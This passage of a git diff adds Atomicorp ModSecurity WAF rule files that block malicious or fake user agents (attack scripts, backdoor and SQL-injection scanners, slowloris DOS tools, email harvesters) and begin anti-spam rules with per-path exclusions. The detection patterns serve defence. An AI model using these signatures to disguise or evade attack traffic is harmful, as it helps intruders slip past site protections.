+SecRule REQUEST_URI "!(\.asmx$)" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,chain,id:330090,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Comment Spammer User Agent (Fake Windows Update Agent)'"
+SecRule REQUEST_HEADERS:User-Agent "windows-update-agent" 
+
+#Vadix bot
+SecRule REQUEST_HEADERS:User-Agent "vadixbot" "phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330095,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vadixbot User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "concealed defense" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330096,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Concealed Defense User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "core-project/1." 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330097,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: core-project/1.0 User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:no browser|user[- ]agent ?:)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,chain,id:330094,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Compromised User-Agent Agent Attack blocked'"
+SecRule REQUEST_HEADERS:User-Agent "!(http://bsalsa\.com|^site24x7)" 
+
+
+SecRule REQUEST_HEADERS:User-Agent "backdoor" 	"phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: backdoor User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:script|sql) injection" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330100,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: script injection User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "security scan" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: script injection User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "stress test" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330102,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Stress Test User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "voideye" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: VoidEYE User Agent String'"
+
+SecRule REQUEST_HEADERS:User-Agent "$botname/$botversion" 	"phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330105,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Broken Bot Generic User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:p(?:e 1\.4|roduction bot|sycheclone)|[a-z]surf[0-9][0-9])" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330110,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Scanbot User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "searchbot admin@google\.com" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330115,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Fake Google Searchengine User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:sogou develop spider|sohu agent)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330116,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Fake Sogou Searchengine User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:bwh3_user_agent|zemu|mama (?:casper|cyber|sox|xirio)|(?:kmccrew|sasqia|casper|planetwork|dex|jcomers|sledink|goblox|indo(?:com|network)) bot search|^perl post$|rk q kangen|t34mh4k|^revolt$)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330122,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Attack Script User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:con(?:tentsmartz|tactbot/)|atomic_email_hunter|isc systems irc search 2\.1)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330124,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Email Harvester Spambot User Agent String Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "(?:demo bot|educate search vxb|full web bot)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,chain,id:330125,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Scanbot User Agent String Detected'"
+SecRule REQUEST_HEADERS:User-Agent "!(flipboardbrowser)" "t:none,t:lowercase"
+
+
+SecRule REQUEST_HEADERS:User-Agent "k1b compatible; rss 6.0; windows sot 5.1 security kol" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330132,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attacker User Agent String Detected'"
+
+
+SecRule REQUEST_HEADERS:User-Agent "pleasecrawl/1\." 	"phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Badbot User Agent String Detected'"
+
+#SecRule REQUEST_HEADERS:User-Agent "yandexbot" #	"id:330137,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: YandexBot Search Engine User Agent Detected (Disable this rules if you wish to allow this search bot, this is not a false positive)'"
+# Rule 330014: Exploit UA
+
+SecRule REQUEST_HEADERS:User-Agent "that's gotta hurt" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330014,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Exploit User Agent Detected'"
+
+SecRule REQUEST_HEADERS:User-Agent "www\.80legs\.com" 	"phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:333514,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Bad Bot www.80legs.com'"
+
+SecRule REQUEST_HEADERS:User-Agent "MJ12bot" 	"phase:2,t:none,deny,log,auditlog,status:403,id:333515,rev:4,severity:4,msg:'Atomicorp.com WAF Rules: MJ12 Distributed bot detected (Disable this rule if you want to allow this bot)',tag:'no_ar'"
+SecMarker END_UA_CHECKS_1
+
+
+#Suspicious useragent
+#SecRule REQUEST_HEADERS:User-Agent "@endsWith ;)"         "chain,phase:2,t:none,t:compressWhitespace,deny,log,auditlog,status:403,id:309925,severity:2,rev:10,msg:'Atomicorp.com WAF Rules: Suspicious User-Agent, parenthesis closed with a semicolon %{REQUEST_HEADERS.User-Agent}'"
+#SecRule REQUEST_HEADERS:User-Agent "!(Qualidator\.com|ExaleadCloudView|^Mozilla/4\.0 \(compatible;\)$|UTVDriveBot|Add Catalog|^Appcelerator|GoHome Spider|^ownCloud News|^Hatena|^facebookexternalhit|DashLinkPreviews|Google-InspectionTool)" "t:none"
+
+#Check major browsers for validity
+SecRule REQUEST_HEADERS:User-Agent  "@pm mozilla ;. newt google explore msie compatible opera"         "id:333925,t:none,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333720,pass,nolog,noauditlog,skipAfter:END_UA_CHECKS_2"
+
+#"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36"
+#"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36"
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/5\.0 \(Windows NT 5\.1\) AppleWebKit/537\.36 \(KHTML, like Gecko\) Chrome/46\.0\.2490\.71 Safari/537\.36" "chain,phase:2,log,deny,auditlog,t:none,id:357989,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Joomla DOS bot blocked'"
+SecRule REQUEST_URI "/administrator" "t:none,t:lowercase"
+
+#Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible\; MSIE 6\.0\; Windows" "chain,phase:2,log,deny,auditlog,t:none,id:397989,rev:1,severity:4,msg:'Atomicorp.com WAF Rules: MSIE 6.0 detected (Disable if you want to allow MSIE 6)'"
+SecRule REQUEST_HEADERS:User-Agent "!(MS Web Services Client Protocol|WormlyBot|webauth@cmcm\.com)" "t:none"
+
+#Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
+SecRule REQUEST_HEADERS:User-Agent "(?:Mozilla/4.0 \(compatible: MSIE 7\.0; Windows NT 6\.0|Mozilla/5\.0 \(Windows; U; MSIE 7\.0)" "chain,phase:2,log,deny,auditlog,t:none,id:354321,rev:2,severity:4,msg:'Atomicorp.com WAF Rules: MSIE 7.0 detected (Disable if you want to allow MSIE 7)'"
+SecRule REQUEST_HEADERS:User-Agent "!(MS Web Services Client Protocol|WormlyBot|webauth@cmcm\.com)" "t:none"
+
+#Fake MSIE 6
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible\; MSIE (?:6\.0\.|6\.00)" "chain,phase:2,log,deny,auditlog,t:none,id:397999,rev:3,severity:4,msg:'Atomicorp.com WAF Rules: Fake MSIE 6.0 detected'"
+SecRule REQUEST_HEADERS:User-Agent "!(MS Web Services Client Protocol|WormlyBot)" "t:none"
+
+#Fake MSIE 5.01
+#User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible; MSIE 5\.01\)" "phase:2,log,deny,auditlog,t:none,id:397970,rev:1,severity:3,msg:'Atomicorp.com WAF Rules: Fake MSIE 5.01 detected'"
+
+#MSIE 5.5
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/4\.0 \(compatible; MSIE 5\.5; Windows NT 5\.0\)" "phase:2,log,deny,auditlog,t:none,id:397990,rev:1,severity:3,msg:'Atomicorp.com WAF Rules: Fake MSIE 5.5 detected'"
+
+#Fake Mozilla UA string
+SecRule REQUEST_HEADERS:User-Agent "(?:$mozilla^|mozilla/[45]\.[1-9]|^mozilla/4\.0$)" 	"phase:2,t:none,t:lowercase,deny,log,auditlog,status:403,id:330131,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Malicious Bot Blocked (Fake Mozilla User Agent String Detected)'"
+
+#Fake Opera browser
+#SecRule REQUEST_HEADERS:User-Agent "^.* Opera[ /][0-9]\." #        "phase:2,t:none,deny,status:403,id:336655,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake Opera browser',chain"
+#SecRule &REQUEST_HEADERS:X-Wap-Profile "@eq 0" "t:none"
+#SecRule &REQUEST_HEADERS:X-Wap-Profile "@eq 0" "t:none,chain"
+#SecRule REQUEST_HEADERS:User-Agent "!(Nintendo DSi)" "t:none"
+
+#Fake MSIE 9
+SecRule REQUEST_HEADERS:User-Agent "^Mozilla/4\.0 \(compatible; MSIE 9.0; Windows NT 6.1\)$"         "phase:2,t:none,deny,status:403,id:336656,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Fake MSIE 9./0 browser %{REQUEST_HEADERS.User-Agent}.',log,auditlog"
+
+#Broken Bot
+SecRule REQUEST_HEADERS:User-Agent "compatible ;\." 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Broken Bot User Agent String Detected'"
+
+# Rule 330072: Some regexps to catch silly bots
+#SecRule REQUEST_HEADERS:User-Agent "(?:^(?:google|i?explorer?\.exe|(?:ms)?ie( [0-9.]+)?[ ]?(?:compatible(?: browser)?)?|mozilla(?: [0-9.]+)?[ ]?\((?:windows|linux|(?:ie )?compatible)\))$|compatible \; msie)" #"chain,phase:2,t:none,t:compressWhitespace,t:lowercase,deny,status:403,id:330072,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Possible Fake Browser detected'"
+#SecRule REQUEST_HEADERS:User-Agent "!(placeware rpc 1\.0\)$)"
+
+# Rule 330074: Some regexps to catch silly bots
+#SecRule REQUEST_HEADERS:User-Agent "^(?:mozilla/5\.0 \(x11; u; linux i686; en-us; rv\:0\.9\.6\+\) gecko/2001112|mozilla/.+[. ]+|mozilla/4\.0 \(compatible\; msie 6\.0\; windows nt 5\.1)$" #	"id:330074,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Comment Spammer User Agent (Fake Mozilla)'"
+
+
+#330076: Broken spammer tool
+SecRule REQUEST_HEADERS:User-Agent "^mozilla/4\.0\+" 	"phase:2,t:none,t:lowercase,deny,status:403,chain,auditlog,log,id:330076,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Possible Fake User Agent (Spammer converting spaces to plus signs)'"
+SecRule REQUEST_HEADERS:User-Agent "^!(mozilla/4.0+\(compatible; uptimerobot/1\..; http://www.uptimerobot.com/\))$"
+
+#SecRule REQUEST_HEADERS:User-Agent "mozilla/4\.0 \(compatible; msie 7\.0; windows nt 5\.1; trident/4\.0 ?; ?(\.net clr.*){4,}.*msoffice 12" SecRule REQUEST_HEADERS:User-Agent "mozilla/4\.0 \(compatible; msie 7\.0; windows nt 5\.1; trident/4\.0 ?; \.net clr 1\.1\.4322; \.net clr 2\.0\.503l3; \.net clr 3\.0\.4506\.2152; \.net clr 3\.5\.30729; ?msoffice 12" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:331136,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Possible slowloris DOS attack tool detected'"
+
+# Rule 330042: Borland Delphi signature, as above, comment out if it gives you problems
+#spammers sometimes use these UAs
+SecRule REQUEST_HEADERS:User-Agent "(?:newt activex\; win32|mozilla.*newt)" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330042,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User agent detected'"
+
+#Older MSIE6 on newer platforms
+#SecRule REQUEST_HEADERS:User-Agent "msie 6\.0[ab]?;(?: .+;)? windows nt [56]\." #	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,status:403,id:336657,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Client using IE6 on verion of Windows that should have IE7 or higher installed'"
+
+#Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+#
+#Mozilla/5.0 (Wihndows NT
+SecRule REQUEST_HEADERS:User-Agent "Mozilla/5\.0 \(Wihndows NT" 	"log,auditlog,phase:1,t:none,deny,log,status:403,id:336658,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Known DOS Attack Tool'"
+
+
+#Known attack box
+#^Mozilla/4.76 \[ru\] \(X11; U; SunOS 5.7 sun4u\)
+SecRule REQUEST_HEADERS:User-Agent "mozilla/4\.76 \[ru\]" 	"phase:2,t:none,t:lowercase,t:compressWhitespace,deny,log,auditlog,status:403,id:330043,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Suspicious User agent detected'"
+
+SecMarker END_UA_CHECKS_2
+
+#exclusions
+
diff --git a/nginx-waf/21_asl_useragents.conf b/nginx-waf/21_asl_useragents.conf
new file mode 100644
index 0000000..2c72d57
--- /dev/null
+++ b/nginx-waf/21_asl_useragents.conf
@@ -0,0 +1,36 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# User Agent Security Rules for modsec 2.x
+#
+# Copyright 2005-2017 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+# ---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+
+SecRule REQUEST_HEADERS:User-Agent  "@pmFromFile bad_agents.txt" "phase:2,log,auditlog,deny,status:403,capture,t:none,t:urlDecodeUni,id:390509,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - User Defined Bad User-Agent blocked',logdata:'%{TX.0}'"
diff --git a/nginx-waf/30_asl_antispam.conf b/nginx-waf/30_asl_antispam.conf
new file mode 100644
index 0000000..c1a0e6f
--- /dev/null
+++ b/nginx-waf/30_asl_antispam.conf
@@ -0,0 +1,813 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/cerberus-gui/parser\.php" "phase:2,id:95100,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/serendipity_admin\.php" "phase:2,id:95101,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cp-admin\.cgi" "phase:2,id:95102,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/typo3/alt_doc\.php" "phase:2,id:95103,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:95104,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/galaxyplugin\.php" "phase:2,id:95105,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/custsave\.php" "phase:2,id:95106,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:95107,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/gceditor\.pl" "phase:2,id:95108,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/compose\.php" "phase:2,id:95109,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tiki-editpage\.php" "phase:2,id:95110,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300079"
+
+SecRule REQUEST_FILENAME "/editimage\.html" "phase:2,id:95111,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/__utm\.gif" "phase:2,id:95112,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/paypallink\.php" "phase:2,id:95113,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/products_product_process\.php" "phase:2,id:95114,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/merchant\.mvc" "phase:2,id:95115,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/product_modify\.php" "phase:2,id:95116,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/news/add" "phase:2,id:95117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:95118,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/edit\.php" "phase:2,id:95119,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/egroupware/index\.php" "phase:2,id:95120,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300075"
+
+SecRule REQUEST_FILENAME "/smf/index\.php" "phase:2,id:95121,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:95122,t:none,pass,nolog,skipAfter:END_RULES_95122"
+
+SecRule ARGS|!ARGS:css_text|!ARGS:message "overflow ?: ?auto" "phase:2,deny,log,auditlog,status:403,id:300200,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Hidden Text',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_RULES_95122
+
+SecRule REQUEST_FILENAME "/livehelp/send\.php" "phase:2,id:95123,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/adserver/www/delivery/lg\.php" "phase:2,id:95124,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/submit\.php" "phase:2,id:95125,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=300077"
+SecAction "phase:2,id:95126,t:none,pass,nolog,skipAfter:END_RULES_95126"
+
+SecRule ARGS|!ARGS:bodytext|!ARGS:code|!ARGS:/^widget-text/|!ARGS:template|!ARGS:/^header/|!ARGS:/^footer/|!ARGS:template_data|!ARGS:/^wpTextbox/|!ARGS:product_description|!ARGS:sitead|!ARGS:/^commontemplate/ "style ?= ?\" ?display ?: ?none ?"         "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300201,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Hidden Text Detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
